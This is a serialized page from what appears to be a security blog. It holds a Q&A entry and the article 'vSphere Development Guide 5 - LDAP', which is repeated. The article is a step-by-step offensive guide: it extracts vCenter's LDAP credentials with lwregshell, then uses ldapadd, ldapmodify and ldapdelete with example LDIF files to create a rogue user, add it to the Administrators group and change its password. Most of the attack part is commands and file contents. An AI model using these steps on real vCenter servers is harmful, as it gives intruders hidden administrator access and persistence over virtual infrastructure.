[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0phM-WrbO5m3URq1IMBL9a5OJDIjHYDojVArK_6j2qU":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},490,"What is the prerequisite for exploiting vCenter's LDAP database to add an administrator user, and how does this method bypass the need for an existing admin password?","The prerequisite is obtaining the administrator user's password, often through previous methods like the [vSphere Automation API](\u002Fnews\u002Fvsphere-development-guide-1-vsphere-automation-api) or PowerCLI. However, once you have the LDAP credentials (exported via `lwregshell`), you can directly connect to the LDAP database and use `ldapadd` to create a new user with administrative privileges, effectively bypassing the need to know the current admin password.","\u003Cp>The prerequisite is obtaining the administrator user&#39;s password, often through previous methods like the [vSphere Automation API](\u002Fnews\u002Fvsphere-development-guide-1-vsphere-automation-api) or PowerCLI. However, once you have the LDAP credentials (exported via `lwregshell`), you can directly connect to the LDAP database and use `ldapadd` to create a new user with administrative privileges, effectively bypassing the need to know the current admin password.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fvsphere-development-guide-5-ldap\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-prerequisite-for-exploiting-vcenters-ldap-database-to-add-an-adminis-1777483414538","vCenter LDAP exploitation, LDAP credentials, privilege escalation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},122,"vSphere Development Guide 5 - LDAP","vsphere-development-guide-5-ldap","Learn to add administrator users in vSphere via LDAP database on vCenter, including exploitation methods and program implementation steps.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous three articles, 'vSphere Development Guide 1 - vSphere Automation API', 'vSphere Development Guide 2 - vSphere Web Services API', and 'vSphere Development Guide 3 - VMware PowerCLI', introduced methods for interacting with virtual machines, but they all had a prerequisite: obtaining the administrator user's password.\u003C\u002Fp>\u003Cp>Therefore, this article will introduce a method to add administrator users via the LDAP database on vCenter, broadening the exploitation approach.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation Methods\u003C\u002Fli>\u003Cli>Program Implementation\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Since there is relatively little content covering this part, I gained some insights from the following resources:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.guardicore.com\u002Fblog\u002Fpwning-vmware-vcenter-cve-2020-3952\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fkb.vmware.com\u002Fs\u002Farticle\u002F2147280\u003C\u002Fp>\u003Cp>vCenter installs an LDAP database by default to store login user information\u003C\u002Fp>\u003Cp>LDAP credential information is stored using Likewise\u003C\u002Fp>\u003Ch3>1. Export LDAP credential information\u003C\u002Fh3>\u003Cp>Run the following command to access the likewise shell:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Flikewise\u002Fbin\u002Flwregshell\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Change directory:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd HKEY_THIS_MACHINE\\services\\vmdir\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>list_values\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution result is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017964245_0_25f428045c.jpeg\">\u003C\u002Fp>\u003Cp>The above commands can be combined into one:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Flikewise\u002Fbin\u002Flwregshell list_values '[HKEY_THIS_MACHINE\\services\\vmdir]'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Connect to the LDAP database\u003C\u002Fh3>\u003Cp>vCenter has built-in ldapsearch, which can be used to query LDAP database information\u003C\u002Fp>\u003Cp>Example query command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapsearch -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -b \"dc=aaa,dc=bbb\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The result is returned in text format. To facilitate analysis of the data structure, you can switch to using the GUI tool LDAP Browser. Download link:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.ldapbrowserwindows.com\u002F\u003C\u002Fp>\u003Cp>Export database information as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017968500_1_5dedeb54ca.jpeg\">\u003C\u002Fp>\u003Ch3>3. Add User\u003C\u002Fh3>\u003Cp>After comparative analysis, the operation of adding a user is equivalent to adding the following information under entryDN\t cn=Users,dc=aaa,dc=bbb:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp># test1, Users, aaa.bbb\u003Cbr>dn: CN=test1,CN=Users,DC=aaa,DC=bbb\u003Cbr>nTSecurityDescriptor:: AQAHhBQAAAA0AAAAAAAAAFQAAAABBgAAAAAABxUAAACm3bprj60+LPb\u003Cbr> uSMg5729v9AEAAAEGAAAAAAAHFQAAAKbdumuPrT4s9u5IyDnvb28gAgAAAgDAAAUAAAAAEygAMQAH\u003Cbr> IAEGAAAAAAAHFQAAAKbdumuPrT4s9u5IyDnvb2\u002F0AQAAABMoADEAByABBgAAAAAABxUAAACm3bprj\u003Cbr> 60+LPbuSMg5729vIAIAAAATKAAxAAcgAQYAAAAAAAcVAAAApt26a4+tPiz27kjIOe9vbwACAAAAEy\u003Cbr> gAEAAAAAEGAAAAAAAHFQAAAKbdumuPrT4s9u5IyDnvb28DAgAAABMYADAAAAABAgAAAAAAByAAAAC\u003Cbr> aAgAA\u003Cbr>krbPrincipalKey:: MIGboAMCAQGhAwIBAKIDAgEBpIGJMIGGMEmhRzBFoAMCARKhPgQ8FLCUOdBv\u003Cbr> 7cUknLaow8mo+zkUu0LbNaQi7gppLCdhVco2gvzFrhg6O6Ww2I6F0FrZ\u002FEBPnnTuV0ozQdopMDmhN\u003Cbr> zA1oAMCARehLgQsPsHK4inqlDsPbt55cFDjqkiNrbwA9Jw8lfN+3O57RqBPcHiOlTEHU\u002FZUQoY=\u003Cbr>userAccountControl: 0\u003Cbr>userPrincipalName: test1@AAA.BBB\u003Cbr>sAMAccountName: test1\u003Cbr>cn: test1\u003Cbr>objectClass: top\u003Cbr>objectClass: person\u003Cbr>objectClass: organizationalPerson\u003Cbr>objectClass: user\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The operation to add database information can use vCenter's built-in ldapadd. Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapadd -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -f adduser.ldif\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example content of adduser.ldif:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dn: CN=test1,CN=Users,DC=aaa,DC=bbb\u003Cbr>userPrincipalName: test1@AAA.BBB\u003Cbr>sAMAccountName: test1\u003Cbr>cn: test1\u003Cbr>objectClass: top\u003Cbr>objectClass: person\u003Cbr>objectClass: organizationalPerson\u003Cbr>objectClass: user\u003Cbr>userPassword: P@ssWord123@@\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Setting user passwords is achieved through the userPassword attribute; it cannot be done by directly setting the nTSecurityDescriptor attribute or the krbPrincipalKey attribute.\u003C\u002Fp>\u003Ch3>4. Add the user to the Administrators group\u003C\u002Fh3>\u003Cp>Adding a user to the Administrators group is equivalent to adding the attribute: member\tCN=test1,CN=Users,DC=aaa,DC=bbb under entryDN\tcn=Administrators,cn=Builtin,dc=aaa,dc=bbb\u003C\u002Fp>\u003Cp>Operations to modify database information can be performed using vCenter's built-in ldapmodify. Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapmodify -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -f addadmin.ldif\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example content of addadmin.ldif:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dn: cn=Administrators,cn=Builtin,dc=aaa,dc=bbb\u003Cbr>changetype: modify\u003Cbr>add: member\u003Cbr>member: CN=test1,CN=Users,DC=aaa,DC=bbb\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Supplement 1: Modify user password\u003C\u002Fh3>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapmodify -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -f changepass.ldif\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example content of changepass.ldif:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dn: CN=test1,CN=Users,DC=aaa,DC=bbb\u003Cbr>changetype: modify\u003Cbr>replace: userPassword\u003Cbr>userPassword: P@ssWord123@@45\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Supplement 2: Delete user\u003C\u002Fh3>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapdelete -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" \"CN=test1,CN=Users,DC=aaa,DC=bbb\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>At this point, the administrator user has been successfully added. The newly added administrator user can be used to log in to the Web management page and can also be used to call the vSphere API.\u003C\u002Fp>\u003Ch2>0x03 Program Implementation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>vCenter has a built-in Python 3 environment, so Python is used for implementation here.\u003C\u002Fp>\u003Cp>The following three packages need to be imported:\u003C\u002Fp>\u003Cul>\u003Cli>os\u003C\u002Fli>\u003Cli>sys\u003C\u002Fli>\u003Cli>re\u003C\u002Fli>\u003C\u002Ful>\u003Cp>vCenter supports them by default and they can be used normally.\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports the following functions:\u003C\u002Fp>\u003Cul>\u003Cli>adduser, add a regular user\u003C\u002Fli>\u003Cli>addadmin, set a regular user as an administrator user\u003C\u002Fli>\u003Cli>changepass, modify user password\u003C\u002Fli>\u003Cli>deleteuser, delete a user\u003C\u002Fli>\u003Cli>getadmin, list all administrator users\u003C\u002Fli>\u003Cli>getuser, list all users\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of adding administrator users via the LDAP database on vCenter. Subsequently, the newly added administrator user can be used to log in to the web management interface or call the vSphere API.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous three articles, 'vSphere Development Guide 1 - vSphere Automation API', 'vSphere Development Guide 2 - vSphere Web Services API', and 'vSphere Development Guide 3 - VMware PowerCLI', introduced methods for interacting with virtual machines, but they all had a prerequisite: obtaining the administrator user's password.\u003C\u002Fp>\u003Cp>Therefore, this article will introduce a method to add administrator users via the LDAP database on vCenter, broadening the exploitation approach.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation Methods\u003C\u002Fli>\u003Cli>Program Implementation\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Since there is relatively little content covering this part, I gained some insights from the following resources:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.guardicore.com\u002Fblog\u002Fpwning-vmware-vcenter-cve-2020-3952\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fkb.vmware.com\u002Fs\u002Farticle\u002F2147280\u003C\u002Fp>\u003Cp>vCenter installs an LDAP database by default to store login user information\u003C\u002Fp>\u003Cp>LDAP credential information is stored using Likewise\u003C\u002Fp>\u003Ch3>1. Export LDAP credential information\u003C\u002Fh3>\u003Cp>Run the following command to access the likewise shell:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Flikewise\u002Fbin\u002Flwregshell\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Change directory:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd HKEY_THIS_MACHINE\\services\\vmdir\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>list_values\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution result is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017964245_0_25f428045c-1.jpeg\">\u003C\u002Fp>\u003Cp>The above commands can be combined into one:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Flikewise\u002Fbin\u002Flwregshell list_values '[HKEY_THIS_MACHINE\\services\\vmdir]'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Connect to the LDAP database\u003C\u002Fh3>\u003Cp>vCenter has built-in ldapsearch, which can be used to query LDAP database information\u003C\u002Fp>\u003Cp>Example query command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapsearch -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -b \"dc=aaa,dc=bbb\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The result is returned in text format. To facilitate analysis of the data structure, you can switch to using the GUI tool LDAP Browser. Download link:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.ldapbrowserwindows.com\u002F\u003C\u002Fp>\u003Cp>Export database information as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017968500_1_5dedeb54ca-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Add User\u003C\u002Fh3>\u003Cp>After comparative analysis, the operation of adding a user is equivalent to adding the following information under entryDN\t cn=Users,dc=aaa,dc=bbb:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp># test1, Users, aaa.bbb\u003Cbr>dn: CN=test1,CN=Users,DC=aaa,DC=bbb\u003Cbr>nTSecurityDescriptor:: AQAHhBQAAAA0AAAAAAAAAFQAAAABBgAAAAAABxUAAACm3bprj60+LPb\u003Cbr> uSMg5729v9AEAAAEGAAAAAAAHFQAAAKbdumuPrT4s9u5IyDnvb28gAgAAAgDAAAUAAAAAEygAMQAH\u003Cbr> IAEGAAAAAAAHFQAAAKbdumuPrT4s9u5IyDnvb2\u002F0AQAAABMoADEAByABBgAAAAAABxUAAACm3bprj\u003Cbr> 60+LPbuSMg5729vIAIAAAATKAAxAAcgAQYAAAAAAAcVAAAApt26a4+tPiz27kjIOe9vbwACAAAAEy\u003Cbr> gAEAAAAAEGAAAAAAAHFQAAAKbdumuPrT4s9u5IyDnvb28DAgAAABMYADAAAAABAgAAAAAAByAAAAC\u003Cbr> aAgAA\u003Cbr>krbPrincipalKey:: MIGboAMCAQGhAwIBAKIDAgEBpIGJMIGGMEmhRzBFoAMCARKhPgQ8FLCUOdBv\u003Cbr> 7cUknLaow8mo+zkUu0LbNaQi7gppLCdhVco2gvzFrhg6O6Ww2I6F0FrZ\u002FEBPnnTuV0ozQdopMDmhN\u003Cbr> zA1oAMCARehLgQsPsHK4inqlDsPbt55cFDjqkiNrbwA9Jw8lfN+3O57RqBPcHiOlTEHU\u002FZUQoY=\u003Cbr>userAccountControl: 0\u003Cbr>userPrincipalName: test1@AAA.BBB\u003Cbr>sAMAccountName: test1\u003Cbr>cn: test1\u003Cbr>objectClass: top\u003Cbr>objectClass: person\u003Cbr>objectClass: organizationalPerson\u003Cbr>objectClass: user\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The operation to add database information can use vCenter's built-in ldapadd. Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapadd -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -f adduser.ldif\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example content of adduser.ldif:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dn: CN=test1,CN=Users,DC=aaa,DC=bbb\u003Cbr>userPrincipalName: test1@AAA.BBB\u003Cbr>sAMAccountName: test1\u003Cbr>cn: test1\u003Cbr>objectClass: top\u003Cbr>objectClass: person\u003Cbr>objectClass: organizationalPerson\u003Cbr>objectClass: user\u003Cbr>userPassword: P@ssWord123@@\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Setting user passwords is achieved through the userPassword attribute; it cannot be done by directly setting the nTSecurityDescriptor attribute or the krbPrincipalKey attribute.\u003C\u002Fp>\u003Ch3>4. Add the user to the Administrators group\u003C\u002Fh3>\u003Cp>Adding a user to the Administrators group is equivalent to adding the attribute: member\tCN=test1,CN=Users,DC=aaa,DC=bbb under entryDN\tcn=Administrators,cn=Builtin,dc=aaa,dc=bbb\u003C\u002Fp>\u003Cp>Operations to modify database information can be performed using vCenter's built-in ldapmodify. Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapmodify -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -f addadmin.ldif\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example content of addadmin.ldif:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dn: cn=Administrators,cn=Builtin,dc=aaa,dc=bbb\u003Cbr>changetype: modify\u003Cbr>add: member\u003Cbr>member: CN=test1,CN=Users,DC=aaa,DC=bbb\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Supplement 1: Modify user password\u003C\u002Fh3>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapmodify -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" -f changepass.ldif\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example content of changepass.ldif:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dn: CN=test1,CN=Users,DC=aaa,DC=bbb\u003Cbr>changetype: modify\u003Cbr>replace: userPassword\u003Cbr>userPassword: P@ssWord123@@45\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Supplement 2: Delete user\u003C\u002Fh3>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ldapdelete -x -H ldap:\u002F\u002F192.168.1.1:389 -D \"cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb\" -w \"P@ssWord123@@\" \"CN=test1,CN=Users,DC=aaa,DC=bbb\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>At this point, the administrator user has been successfully added. The newly added administrator user can be used to log in to the Web management page and can also be used to call the vSphere API.\u003C\u002Fp>\u003Ch2>0x03 Program Implementation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>vCenter has a built-in Python 3 environment, so Python is used for implementation here.\u003C\u002Fp>\u003Cp>The following three packages need to be imported:\u003C\u002Fp>\u003Cul>\u003Cli>os\u003C\u002Fli>\u003Cli>sys\u003C\u002Fli>\u003Cli>re\u003C\u002Fli>\u003C\u002Ful>\u003Cp>vCenter supports them by default and they can be used normally.\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports the following functions:\u003C\u002Fp>\u003Cul>\u003Cli>adduser, add a regular user\u003C\u002Fli>\u003Cli>addadmin, set a regular user as an administrator user\u003C\u002Fli>\u003Cli>changepass, modify user password\u003C\u002Fli>\u003Cli>deleteuser, delete a user\u003C\u002Fli>\u003Cli>getadmin, list all administrator users\u003C\u002Fli>\u003Cli>getuser, list all users\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of adding administrator users via the LDAP database on vCenter. Subsequently, the newly added administrator user can be used to log in to the web management interface or call the vSphere API.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1106,"Onedaysec",3,"published","2026-02-02T07:51:00.065Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"vSphere LDAP Guide: Add Admin Users via vCenter LDAP Database","vSphere LDAP, vCenter LDAP, add admin user, LDAP database, vSphere development, VMware security",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],493,492,491,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.071Z","2026-07-23T16:01:38.701Z","draft","2026-07-23T16:12:42.230Z"]